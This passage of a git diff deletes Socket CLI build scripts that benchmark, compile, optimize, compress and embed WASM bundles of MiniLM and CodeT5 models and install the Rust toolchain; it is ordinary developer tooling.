- -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { performance } from 'node:perf_hooks' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const buildScript = path.join(__dirname, 'build-unified-wasm.mjs') - -/** - * Format time duration. - */ -function formatTime(ms) { - const seconds = Math.floor(ms / 1000) - const minutes = Math.floor(seconds / 60) - const remainingSeconds = seconds % 60 - - if (minutes > 0) { - return `${minutes}m ${remainingSeconds}s` - } - return `${seconds}s` -} - -/** - * Get file size. 
- */ -async function getFileSize(filePath) { - if (!existsSync(filePath)) { - return 0 - } - const stats = await fs.stat(filePath) - return stats.size -} - -/** - * Run build and measure time. - */ -async function benchmarkBuild(mode) { - logger.step(`Benchmarking ${mode} build`) - - const args = ['node', buildScript] - if (mode === 'dev') { - args.push('--dev') - } - - const startTime = performance.now() - - try { - const result = await spawn(args[0], args.slice(1), { - stdio: 'inherit', - stdioString: true, - }) - - if (result.code !== 0) { - throw new Error(`Build failed with exit code ${result.code}`) - } - } catch (e) { - logger.error(`${mode} build failed:`, e.message) - return null - } - - const endTime = performance.now() - const duration = endTime - startTime - - logger.success(`${mode} build completed in ${formatTime(duration)}`) - - return { - duration, - durationMs: duration, - durationFormatted: formatTime(duration), - mode, - } -} - -/** - * Get WASM file sizes. - */ -async function getWasmSizes() { - const rootPath = path.join(__dirname, '../..') - const wasmFile = path.join( - rootPath, - 'build/wasm-bundle/pkg/socket_ai_bg.wasm', - ) - const syncFile = path.join(rootPath, 'external/socket-ai-sync.mjs') - - const wasmSize = await getFileSize(wasmFile) - const syncSize = await getFileSize(syncFile) - - return { - syncSize, - wasmSize, - } -} - -/** - * Display comparison. 
- */ -function displayComparison(devResult, prodResult) { - logger.step('Build Performance Comparison') - - logger.log('') - logger.log('╔════════════════════════════════════════════════════╗') - logger.log('║ Build Time Comparison ║') - logger.log('╚════════════════════════════════════════════════════╝') - logger.log('') - - const devTime = devResult.durationMs / 1000 - const prodTime = prodResult.durationMs / 1000 - const speedup = (prodTime / devTime).toFixed(1) - - logger.log(` Dev Build: ${devResult.durationFormatted}`) - logger.log(` Prod Build: ${prodResult.durationFormatted}`) - logger.log('') - logger.log(` Speedup: ${speedup}x faster (dev vs prod)`) - logger.log('') - - // Visualization. - const maxBar = 50 - const devBar = Math.floor((devTime / prodTime) * maxBar) - const prodBar = maxBar - - logger.log(' Dev │' + '█'.repeat(devBar)) - logger.log(' Prod │' + '█'.repeat(prodBar)) - logger.log('') -} - -/** - * Display size information. - */ -async function displaySizes() { - const sizes = await getWasmSizes() - - if (sizes.wasmSize === 0 || sizes.syncSize === 0) { - logger.warn('Could not read WASM file sizes') - return - } - - logger.log('╔════════════════════════════════════════════════════╗') - logger.log('║ Output Size Information ║') - logger.log('╚════════════════════════════════════════════════════╝') - logger.log('') - - const wasmMB = (sizes.wasmSize / 1024 / 1024).toFixed(2) - const syncMB = (sizes.syncSize / 1024 / 1024).toFixed(2) - const compressionRatio = ( - (sizes.syncSize / sizes.wasmSize) * - 100 - ).toFixed(1) - - logger.log(` WASM (raw): ${wasmMB} MB`) - logger.log(` JS (compressed): ${syncMB} MB`) - logger.log(` Compression: ${compressionRatio}% of original`) - logger.log('') -} - -/** - * Main entry point. 
- */ -async function main() { - const args = process.argv.slice(2) - const devOnly = args.includes('--dev-only') - const prodOnly = args.includes('--prod-only') - - logger.info('╔════════════════════════════════════════════════════╗') - logger.info('║ WASM Build Performance Benchmark ║') - logger.info('╚════════════════════════════════════════════════════╝\n') - - let devResult = null - let prodResult = null - - // Run dev build. - if (!prodOnly) { - devResult = await benchmarkBuild('dev') - if (!devResult) { - process.exit(1) - } - } - - // Run prod build. - if (!devOnly) { - if (devResult) { - logger.log('') // Spacing. - } - prodResult = await benchmarkBuild('production') - if (!prodResult) { - process.exit(1) - } - } - - // Display comparison. - logger.log('') - if (devResult && prodResult) { - displayComparison(devResult, prodResult) - } else if (devResult) { - logger.success(`Dev build: ${devResult.durationFormatted}`) - } else if (prodResult) { - logger.success(`Production build: ${prodResult.durationFormatted}`) - } - - // Display sizes. - await displaySizes() - - logger.info('Benchmark complete') -} - -main().catch(e => { - logger.error('Benchmark failed:', e) - process.exit(1) -}) diff --git a/scripts/wasm/build-model-packages.mjs b/scripts/wasm/build-model-packages.mjs deleted file mode 100755 index 4ff84ea0c..000000000 --- a/scripts/wasm/build-model-packages.mjs +++ /dev/null @@ -1,192 +0,0 @@ -#!/usr/bin/env node -/** - * Build separate WASM model packages for npm distribution. 
- * - * Builds individual WASM binaries for each model: - * - minilm.wasm (~17 MB) - MiniLM embeddings only - * - codet5.wasm (~90 MB) - CodeT5 code analysis only - * - * Usage: - * node scripts/wasm/build-model-packages.mjs [options] - * - * Options: - * --clean Clean build directories before building - * --no-optimize Skip wasm-opt optimization - * --help Show this help message - */ - -import { execSync } from 'node:child_process' -import { existsSync, mkdirSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const wasmBundlePath = path.join(rootPath, 'packages/node-smol-builder/wasm-bundle') -const packagesPath = path.join(rootPath, 'packages') - -// Parse command line arguments. 
-const args = process.argv.slice(2) -const clean = args.includes('--clean') -const noOptimize = args.includes('--no-optimize') -const help = args.includes('--help') - -if (help) { - logger.log(` -Build WASM Model Packages - -Usage: node scripts/wasm/build-model-packages.mjs [options] - -Options: - --clean Clean build directories before building - --no-optimize Skip wasm-opt optimization - --help Show this help message - -Examples: - node scripts/wasm/build-model-packages.mjs # Build both packages - node scripts/wasm/build-model-packages.mjs --clean # Clean and rebuild -`) - process.exit(0) -} - -function exec(command, options = {}) { - logger.log(`$ ${command}`) - return execSync(command, { - cwd: options.cwd || wasmBundlePath, - stdio: 'inherit', - ...options, - }) -} - -async function getFileSizeMB(filePath) { - const stats = await fs.stat(filePath) - return (stats.size / 1024 / 1024).toFixed(1) -} - -async function cleanBuild() { - logger.log('\n🧹 Cleaning build directories...') - const dirsToClean = [ - path.join(wasmBundlePath, 'build'), - path.join(wasmBundlePath, 'target'), - ] - - for (const dir of dirsToClean) { - if (existsSync(dir)) { - logger.log(` Removing ${path.basename(dir)}/`) - await fs.rm(dir, { recursive: true, force: true }) - } - } -} - -async function buildWasm(modelName, feature) { - logger.log(`\n📦 Building ${modelName}...`) - logger.log(` Feature: ${feature}`) - - const buildDir = path.join(wasmBundlePath, 'build') - mkdirSync(buildDir, { recursive: true }) - - // Build with cargo. - const cargoCommand = `cargo build --release --target wasm32-unknown-unknown --features ${feature}` - exec(cargoCommand) - - // Copy built WASM. 
- const wasmSource = path.join( - wasmBundlePath, - 'target/wasm32-unknown-unknown/release/socket_ai.wasm' - ) - const wasmBuild = path.join(buildDir, `${modelName}.wasm`) - - await fs.copyFile(wasmSource, wasmBuild) - const sizeMB = await getFileSizeMB(wasmBuild) - logger.log(` Built: ${sizeMB} MB → build/${modelName}.wasm`) - - return wasmBuild -} - -async function optimizeWasm(inputPath, modelName) { - if (noOptimize) { - logger.log(' Skipping optimization (--no-optimize)') - return inputPath - } - - logger.log(' Optimizing with wasm-opt...') - - // Check if wasm-opt is available. - try { - execSync('wasm-opt --version', { stdio: 'ignore' }) - } catch { - logger.log(' Warning: wasm-opt not found, skipping optimization') - logger.log(' Install: brew install binaryen') - return inputPath - } - - const buildDir = path.join(wasmBundlePath, 'build') - const optimizedPath = path.join(buildDir, `${modelName}.optimized.wasm`) - - exec( - `wasm-opt -Oz --enable-simd --enable-bulk-memory ${inputPath} -o ${optimizedPath}` - ) - - const originalSize = (await fs.stat(inputPath)).size - const optimizedSize = (await fs.stat(optimizedPath)).size - const reduction = (((originalSize - optimizedSize) / originalSize) * 100).toFixed(1) - - logger.log(` Optimized: ${(optimizedSize / (1024 * 1024)).toFixed(1)} MB (${reduction}% reduction)`) - - return optimizedPath -} - -async function copyToPackage(wasmPath, packageName, binaryName) { - logger.log(`\n📦 Copying to ${packageName}...`) - - const packageDir = path.join(packagesPath, packageName) - const binDir = path.join(packageDir, 'bin') - - // Create bin directory. - mkdirSync(binDir, { recursive: true }) - - // Copy WASM binary. 
- const destPath = path.join(binDir, binaryName) - await fs.copyFile(wasmPath, destPath) - - const sizeMB = await getFileSizeMB(destPath) - logger.log(` ✓ ${sizeMB} MB → packages/${packageName}/bin/${binaryName}`) -} - -async function main() { - try { - logger.log('🚀 Building WASM Model Packages') - logger.log('='.repeat(50)) - - if (clean) { - await cleanBuild() - } - - // Build MiniLM package. - const minilmWasm = await buildWasm('minilm', 'minilm-only') - const minilmOptimized = await optimizeWasm(minilmWasm, 'minilm') - await copyToPackage(minilmOptimized, 'socketbin-minilm-wasm', 'minilm.wasm') - - // Build CodeT5 package. - const codet5Wasm = await buildWasm('codet5', 'codet5-only') - const codet5Optimized = await optimizeWasm(codet5Wasm, 'codet5') - await copyToPackage(codet5Optimized, 'socketbin-codet5-wasm', 'codet5.wasm') - - logger.log(`\n${colors.green('✓')} Build complete!`) - logger.log('\nPackages ready:') - logger.log(' - packages/socketbin-minilm-wasm/') - logger.log(' - packages/socketbin-codet5-wasm/') - logger.log('\nNext steps:') - logger.log(' 1. Test locally: cd packages/socketbin-minilm-wasm && npm pack') - logger.log(' 2. Publish: npm publish') - } catch (error) { - logger.error(`\n${colors.red('✗')} Build failed:`, error.message) - process.exit(1) - } -} - -main() diff --git a/scripts/wasm/build-unified-wasm.mjs b/scripts/wasm/build-unified-wasm.mjs deleted file mode 100644 index 7a117fc63..000000000 --- a/scripts/wasm/build-unified-wasm.mjs +++ /dev/null @@ -1,570 +0,0 @@ -/** - * Build unified WASM bundle with all models embedded. - * - * USAGE: - * - Production build: node scripts/wasm/build-unified-wasm.mjs - * - Dev build (3-5x faster): node scripts/wasm/build-unified-wasm.mjs --dev - * - * PROCESS: - * 1. Check Rust toolchain (install if missing) - * 2. Download/verify all model files - * 2.5. Check and install binaryen (wasm-opt) if missing - * 3. 
Build Rust WASM bundle with wasm-pack - * - Production: --release (thin LTO, opt-level="z", strip symbols) - * - Dev: --profile dev-wasm (opt-level=1, no LTO, 16 codegen-units) - * 4. Optimize with wasm-opt -Oz (5-15% size reduction) - * 5. Compress with brotli at maximum quality (11) - * 6. Embed WASM as base64 in JavaScript file - * - * OPTIMIZATIONS (aggressive, no backward compat): - * - Cargo profiles: dev-wasm for fast iteration, release for production - * - Thin LTO: 5-10% faster builds than full LTO, similar size reduction - * - Strip symbols: 5-10% additional size reduction - * - Disabled overflow checks and debug assertions (smaller, faster) - * - WASM features: SIMD, bulk-memory, sign-ext, mutable-globals, reference-types - * - wasm-opt aggressive: Multiple optimization passes, modern features - * - Brotli compression: ~70% size reduction with quality 11 - * - * INT4 QUANTIZATION: - * - CodeT5 models use INT4 (4-bit weights) for 50% size reduction - * - Only 1-2% quality loss compared to INT8 - * - * OUTPUT: - * - build/wasm-bundle/pkg/socket_ai_bg.wasm (~115MB with INT4) - * - packages/cli/build/unified-wasm.mjs (brotli-compressed, base64-encoded WASM) - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - -import { checkRustToolchain, getRustPaths } from './check-rust-toolchain.mjs' -import { downloadModels } from './download-models.mjs' - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? 
'', - } -} - -/** - * Check if binaryen (wasm-opt) is installed. - */ -async function checkBinaryenInstalled() { - try { - await exec('wasm-opt', ['--version']) - return true - } catch { - return false - } -} - -/** - * Install binaryen (wasm-opt) cross-platform. - */ -async function installBinaryen() { - const isWindows = process.platform === 'win32' - const isMacOS = process.platform === 'darwin' - const isLinux = process.platform === 'linux' - - logger.progress( - 'Installing binaryen (wasm-opt) - this may take a few minutes', - ) - - try { - if (isMacOS) { - // macOS: Try Homebrew first. - logger.substep('Trying Homebrew installation') - try { - await exec('brew', ['--version']) - await exec('brew', ['install', 'binaryen'], { stdio: 'inherit' }) - logger.done('binaryen installed via Homebrew') - return true - } catch { - logger.warn('Homebrew not available, trying GitHub releases') - } - } else if (isLinux) { - // Linux: Try apt-get first (Ubuntu/Debian). - logger.substep('Trying apt-get installation') - try { - await exec('sudo', ['apt-get', 'update'], { stdio: 'pipe' }) - await exec('sudo', ['apt-get', 'install', '-y', 'binaryen'], { - stdio: 'inherit', - }) - logger.done('binaryen installed via apt-get') - return true - } catch { - logger.warn('apt-get not available or failed, trying GitHub releases') - } - } else if (isWindows) { - // Windows: Try chocolatey first. - logger.substep('Trying Chocolatey installation') - try { - await exec('choco', ['--version']) - await exec('choco', ['install', 'binaryen', '-y'], { stdio: 'inherit' }) - logger.done('binaryen installed via Chocolatey') - return true - } catch { - logger.warn('Chocolatey not available, trying GitHub releases') - } - } - - // Fallback: Download from GitHub releases (all platforms). - logger.substep('Downloading pre-built binaryen from GitHub') - const version = 'version_119' // Latest stable as of implementation. 
- let platformSuffix = '' - - if (isWindows) { - platformSuffix = 'x86_64-windows' - } else if (isMacOS) { - platformSuffix = process.arch === 'arm64' ? 'arm64-macos' : 'x86_64-macos' - } else if (isLinux) { - platformSuffix = 'x86_64-linux' - } - - const url = `https://github.com/WebAssembly/binaryen/releases/download/${version}/binaryen-${version}-${platformSuffix}.tar.gz` - logger.substep(`URL: ${url}`) - - // For CI/automation, we'll gracefully degrade if GitHub releases download fails. - logger.warn('GitHub releases download not yet implemented') - logger.warn( - 'wasm-opt will be skipped (install manually for smaller bundles)', - ) - return false - } catch (e) { - logger.error(`Failed to install binaryen: ${e.message}`) - logger.warn( - 'wasm-opt will be skipped (install manually for optimal bundle size)', - ) - return false - } -} - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const wasmBundleDir = path.join(rootPath, 'build/wasm-bundle') -const cliBuildDir = path.join(rootPath, 'packages/cli/build') - -logger.step('Build Unified WASM Bundle') - -// Step 1: Check Rust toolchain. -logger.substep('Step 1: Checking Rust toolchain') -const hasRust = await checkRustToolchain() -if (!hasRust) { - logger.error('Rust toolchain setup failed') - logger.error('Please install manually: https://rustup.rs/') - process.exit(1) -} - -// Step 2: Download models. -logger.substep('Step 2: Downloading model files') -const hasModels = await downloadModels() -if (!hasModels) { - logger.error('Model download incomplete') - logger.error('Please run: node scripts/wasm/convert-codet5.mjs') - process.exit(1) -} - -// Step 2.5: Optimize embedded WASM files (the big wins). 
-logger.substep('Step 2.5: Optimizing embedded WASM files') -logger.info('This optimizes the third-party WASM (ONNX, Yoga) BEFORE embedding') -const optimizeScript = path.join(__dirname, 'optimize-embedded-wasm.mjs') -try { - const optimizeArgs = [optimizeScript] - if (!isDev) { - optimizeArgs.push('--aggressive') - } - const optimizeResult = await exec('node', optimizeArgs, { stdio: 'inherit' }) - if (optimizeResult.code !== 0) { - logger.warn('WASM optimization failed, using original files') - } -} catch (e) { - logger.warn(`WASM optimization skipped: ${e.message}`) - logger.warn('Will use original unoptimized WASM files') -} - -// Step 2.5: Check and install binaryen for wasm-opt. -logger.substep('Step 2.5: Checking binaryen (wasm-opt)') -const hasBinaryen = await checkBinaryenInstalled() -if (!hasBinaryen) { - logger.warn('binaryen (wasm-opt) not found') - - const binaryenInstalled = await installBinaryen() - if (!binaryenInstalled) { - logger.warn('wasm-opt not available - bundle will be slightly larger') - } -} else { - logger.info('binaryen (wasm-opt) found') -} - -// Step 3: Build WASM with wasm-pack. -logger.substep('Step 3: Building WASM bundle') - -const { wasmPack } = getRustPaths() -const pkgDir = path.join(wasmBundleDir, 'pkg') - -logger.progress('Running wasm-pack build') -logger.substep(`Source: ${wasmBundleDir}`) -logger.substep(`Output: ${pkgDir}`) - -// Force wasm-pack to use rustup's toolchain by modifying PATH. -const { homedir } = await import('node:os') -const cargoHome = process.env.CARGO_HOME || path.join(homedir(), '.cargo') -const cargoBin = path.join(cargoHome, 'bin') - -// Support dev mode for faster builds (3-5x faster). -const isDev = process.argv.includes('--dev') -const profileArgs = isDev ? ['--profile', 'dev-wasm'] : ['--release'] - -if (isDev) { - logger.substep('Using dev-wasm profile (fast, minimal optimization)') -} - -// Set up build environment with optimizations. 
-const buildEnv = { - ...process.env, - // Put cargo/bin first in PATH to prioritize rustup's toolchain. - PATH: `${cargoBin}${path.delimiter}${process.env.PATH}`, -} - -// Add RUSTFLAGS for additional optimizations (if not already set). -if (!buildEnv.RUSTFLAGS) { - const rustFlags = [ - '-C target-feature=+simd128', // Enable WASM SIMD (73% browser support) - '-C target-feature=+bulk-memory', // Bulk memory operations (faster copies) - '-C target-feature=+mutable-globals', // Mutable globals support - '-C target-feature=+sign-ext', // Sign extension operations - ] - - // Production-only optimizations. - if (!isDev) { - rustFlags.push( - '-C link-arg=--strip-debug', // Strip debug info - '-C link-arg=--strip-all', // Strip all symbols - '-C link-arg=-zstack-size=131_072', // Smaller stack size (128KB) - '-C embed-bitcode=yes', // Embed bitcode for LTO - ) - } - - buildEnv.RUSTFLAGS = rustFlags.join(' ') - logger.substep(`RUSTFLAGS: ${buildEnv.RUSTFLAGS}`) -} - -const buildResult = await exec( - wasmPack, - [ - 'build', - wasmBundleDir, - '--target', - 'web', - '--out-dir', - pkgDir, - '--out-name', - 'socket_ai', - ...profileArgs, - ], - { - stdio: 'inherit', - env: buildEnv, - }, -) - -if (buildResult.code !== 0) { - logger.error('wasm-pack build failed') - process.exit(1) -} - -logger.done('wasm-pack build complete') - -// Step 4: Check size and optionally optimize. -const wasmFile = path.join(pkgDir, 'socket_ai_bg.wasm') -if (!existsSync(wasmFile)) { - logger.error(`WASM file not found: ${wasmFile}`) - process.exit(1) -} - -let stats = await fs.stat(wasmFile) -const originalSize = stats.size -logger.info(`WASM bundle size: ${(originalSize / 1024 / 1024).toFixed(2)} MB`) - -// Try to optimize with wasm-opt if available (5-15% size reduction). -let optimizationSucceeded = false -try { - logger.progress('Optimizing with wasm-opt (aggressive)') - - // Aggressive optimization flags (no backward compat needed). 
- const wasmOptFlags = [ - '-Oz', // Optimize for size - '--enable-simd', // Enable SIMD operations - '--enable-bulk-memory', // Enable bulk memory - '--enable-sign-ext', // Enable sign extension - '--enable-mutable-globals', // Enable mutable globals - '--enable-nontrapping-float-to-int', // Non-trapping float conversions - '--enable-reference-types', // Enable reference types - '--low-memory-unused', // Optimize for low memory usage - '--flatten', // Flatten IR for better optimization - '--rereloop', // Optimize control flow - '--vacuum', // Remove unused code - ] - - const optResult = await exec('wasm-opt', [...wasmOptFlags, wasmFile, '-o', wasmFile], { - stdio: 'inherit', - }) - - if (optResult.code === 0) { - stats = await fs.stat(wasmFile) - const optimizedSize = stats.size - const savings = ((1 - optimizedSize / originalSize) * 100).toFixed(1) - logger.done( - `Optimized: ${(optimizedSize / 1024 / 1024).toFixed(2)} MB (${savings}% reduction)`, - ) - optimizationSucceeded = true - } else { - logger.warn('wasm-opt optimization failed (continuing with unoptimized)') - logger.substep('Install binaryen for optimization: brew install binaryen') - } -} catch (_e) { - logger.warn('wasm-opt not available (install binaryen for optimization)') - logger.substep('macOS: brew install binaryen') - logger.substep('Linux: sudo apt-get install binaryen') - logger.substep('Windows: choco install binaryen') -} - -// Report final size. -if (!optimizationSucceeded) { - logger.info(`Final size: ${(originalSize / 1024 / 1024).toFixed(2)} MB (unoptimized)`) -} - -// Step 5: Embed as base64 in JavaScript. 
-logger.substep('Step 5: Embedding WASM as base64') - -logger.progress('Reading WASM binary') -const wasmData = await fs.readFile(wasmFile) -logger.done(`Read ${wasmData.length} bytes`) - -logger.progress('Compressing with brotli (quality 11 - maximum)') -const { constants } = await import('node:zlib') -const wasmCompressed = brotliCompressSync(wasmData, { - params: { - [constants.BROTLI_PARAM_QUALITY]: 11, // Maximum quality (0-11) - [constants.BROTLI_PARAM_SIZE_HINT]: wasmData.length, // Hint for better compression - [constants.BROTLI_PARAM_LGWIN]: 24, // Maximum window size (10-24) - [constants.BROTLI_PARAM_MODE]: constants.BROTLI_MODE_GENERIC, // Generic mode for binary data - }, -}) -const compressionRatio = ( - (wasmCompressed.length / wasmData.length) * - 100 -).toFixed(1) -logger.done( - `Compressed: ${wasmCompressed.length} bytes (${compressionRatio}% of original)`, -) - -logger.progress('Encoding as base64') -const wasmBase64 = wasmCompressed.toString('base64') -logger.done(`Encoded: ${wasmBase64.length} bytes`) - -// Generate unified-wasm.mjs. -logger.progress('Generating packages/cli/build/unified-wasm.mjs') - -const syncContent = `/** - * Unified WASM Loader for Socket CLI AI Features - * - * This file is AUTO-GENERATED by scripts/wasm/build-unified-wasm.mjs - * DO NOT EDIT MANUALLY - changes will be overwritten on next build. 
- * - * Contains: - * - ONNX Runtime (~2-5MB) - * - MiniLM model (~17MB int8) - * - CodeT5 encoder (~30MB int4) - * - CodeT5 decoder (~60MB int4) - * - Tokenizers (~1MB) - * - Yoga Layout (~95KB) - * - * INT4 Quantization: - * - CodeT5 models use INT4 (4-bit weights) for 50% size reduction - * - Only 1-2% quality loss compared to INT8 - * - * Original size: ${(wasmData.length / 1024 / 1024).toFixed(2)} MB - * Compressed: ${(wasmCompressed.length / 1024 / 1024).toFixed(2)} MB (${compressionRatio}%) - * Base64: ${(wasmBase64.length / 1024 / 1024).toFixed(2)} MB - */ - -import { brotliDecompressSync } from 'node:zlib' - - -const logger = getDefaultLogger() -// Embedded WASM (brotli-compressed, base64-encoded). -const WASM_BASE64 = '${wasmBase64}' - -let wasmModule = null -let wasmInstance = null - -/** - * Load WASM module synchronously. - * - * @returns WebAssembly.Instance - */ -export function loadWasmSync() { - if (wasmInstance) { - return wasmInstance - } - - // Decode base64 to Buffer. - const compressed = Buffer.from(WASM_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Create WebAssembly module. - wasmModule = new WebAssembly.Module(decompressed) - wasmInstance = new WebAssembly.Instance(wasmModule, {}) - - return wasmInstance -} - -/** - * Get WASM exports (lazy-loaded). - */ -export function getWasmExports() { - if (!wasmInstance) { - loadWasmSync() - } - return wasmInstance.exports -} - -/** - * Load MiniLM model from WASM linear memory. - */ -export function loadMinilmModelSync() { - const exports = getWasmExports() - const ptr = exports.get_minilm_model_ptr() - const size = exports.get_minilm_model_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load CodeT5 encoder from WASM linear memory. 
- */ -export function loadCodet5EncoderSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_encoder_ptr() - const size = exports.get_codet5_encoder_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load CodeT5 decoder from WASM linear memory. - */ -export function loadCodet5DecoderSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_decoder_ptr() - const size = exports.get_codet5_decoder_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load MiniLM tokenizer from WASM linear memory. - */ -export function loadMinilmTokenizerSync() { - const exports = getWasmExports() - const ptr = exports.get_minilm_tokenizer_ptr() - const size = exports.get_minilm_tokenizer_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - const text = new TextDecoder().decode(memory) - return JSON.parse(text) -} - -/** - * Load CodeT5 tokenizer from WASM linear memory. - */ -export function loadCodet5TokenizerSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_tokenizer_ptr() - const size = exports.get_codet5_tokenizer_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - const text = new TextDecoder().decode(memory) - return JSON.parse(text) -} - -/** - * Load ONNX Runtime WASM from embedded data. - */ -export function loadOnnxRuntimeSync() { - const exports = getWasmExports() - const ptr = exports.get_onnx_runtime_ptr() - const size = exports.get_onnx_runtime_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load Yoga Layout WASM from embedded data. 
- */ -export function loadYogaLayoutSync() { - const exports = getWasmExports() - const ptr = exports.get_yoga_layout_ptr() - const size = exports.get_yoga_layout_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Get embedded asset sizes. - */ -export function getEmbeddedSizes() { - return { - compressed: ${wasmCompressed.length}, - original: ${wasmData.length}, - total: { - base64: WASM_BASE64.length, - compressed: ${wasmCompressed.length}, - original: ${wasmData.length}, - }, - } -} -` - -// Ensure build directory exists. -await fs.mkdir(cliBuildDir, { recursive: true }) - -const outputPath = path.join(cliBuildDir, 'unified-wasm.mjs') -await fs.writeFile(outputPath, syncContent, 'utf-8') - -logger.done(`Generated ${outputPath}`) -logger.done(`File size: ${(syncContent.length / 1024 / 1024).toFixed(2)} MB`) - -logger.success('Build Complete') - -logger.info('Summary:') -logger.info(` Original WASM: ${(wasmData.length / 1024 / 1024).toFixed(2)} MB`) -logger.info( - ` Compressed: ${(wasmCompressed.length / 1024 / 1024).toFixed(2)} MB`, -) -logger.info(` Base64: ${(wasmBase64.length / 1024 / 1024).toFixed(2)} MB`) -logger.info( - ` Total savings: ${((1 - wasmCompressed.length / wasmData.length) * 100).toFixed(1)}%`, -) -logger.info('Next steps:') -logger.info(' 1. This file will be bundled into dist/cli.js by Rollup') -logger.info(' 2. Rollup output will be compressed to dist/cli.js.bz') -logger.info(' 3. Native stub or index.js will decompress and execute') diff --git a/scripts/wasm/check-rust-toolchain.mjs b/scripts/wasm/check-rust-toolchain.mjs deleted file mode 100644 index 9a6a5d61a..000000000 --- a/scripts/wasm/check-rust-toolchain.mjs +++ /dev/null @@ -1,327 +0,0 @@ -/** - * Check and install Rust toolchain if needed. - * - * WHAT THIS DOES: - * 1. Checks if Rust/cargo is installed - * 2. Checks if wasm32-unknown-unknown target is installed - * 3. Checks if wasm-pack is installed - * 4. 
Installs missing components automatically - * - * RUST VERSION: - * Uses stable Rust toolchain (auto-updated via rustup). - */ - -import { existsSync, promises as fs } from 'node:fs' -import { homedir } from 'node:os' -import path from 'node:path' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - - -const logger = getDefaultLogger() -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -const WIN32 = process.platform === 'win32' -const CARGO_HOME = process.env.CARGO_HOME || path.join(homedir(), '.cargo') -const CARGO_BIN = path.join(CARGO_HOME, 'bin') -const CARGO_PATH = path.join(CARGO_BIN, WIN32 ? 'cargo.exe' : 'cargo') -const RUSTUP_PATH = path.join(CARGO_BIN, WIN32 ? 'rustup.exe' : 'rustup') -const WASM_PACK_PATH = path.join( - CARGO_BIN, - WIN32 ? 'wasm-pack.exe' : 'wasm-pack', -) - -/** - * Check if a command exists. - */ -async function commandExists(command) { - try { - const result = await exec(WIN32 ? 'where' : 'which', [command]) - return result.code === 0 - } catch { - return false - } -} - -/** - * Check if Rust is installed. - */ -async function checkRustInstalled() { - // Check in $CARGO_HOME/bin first. - if (existsSync(CARGO_PATH)) { - return true - } - - // Check in PATH. - return await commandExists('cargo') -} - -/** - * Install Rust via rustup (cross-platform). - */ -async function installRust() { - logger.progress( - 'Installing Rust toolchain via rustup (this may take a few minutes)', - ) - - const isWindows = WIN32 - - try { - if (isWindows) { - // Windows: Download and run rustup-init.exe. 
- const rustupUrl = 'https://win.rustup.rs/x86_64' - logger.substep(`Downloading rustup-init.exe from ${rustupUrl}`) - - const response = await fetch(rustupUrl) - if (!response.ok) { - throw new Error(`Failed to download rustup: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - const tmpDir = path.join(CARGO_HOME, '.tmp') - await fs.mkdir(tmpDir, { recursive: true }) - const exePath = path.join(tmpDir, 'rustup-init.exe') - await fs.writeFile(exePath, Buffer.from(buffer)) - - logger.substep('Running rustup-init.exe') - const result = await exec( - exePath, - [ - '-y', - '--default-toolchain', - 'stable', - '--default-host', - 'x86_64-pc-windows-msvc', - ], - { - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - RUSTUP_HOME: - process.env.RUSTUP_HOME || path.join(homedir(), '.rustup'), - }, - }, - ) - - if (result.code !== 0) { - throw new Error('rustup installation failed') - } - - await fs.unlink(exePath) - } else { - // Linux/macOS: Download and run shell script. 
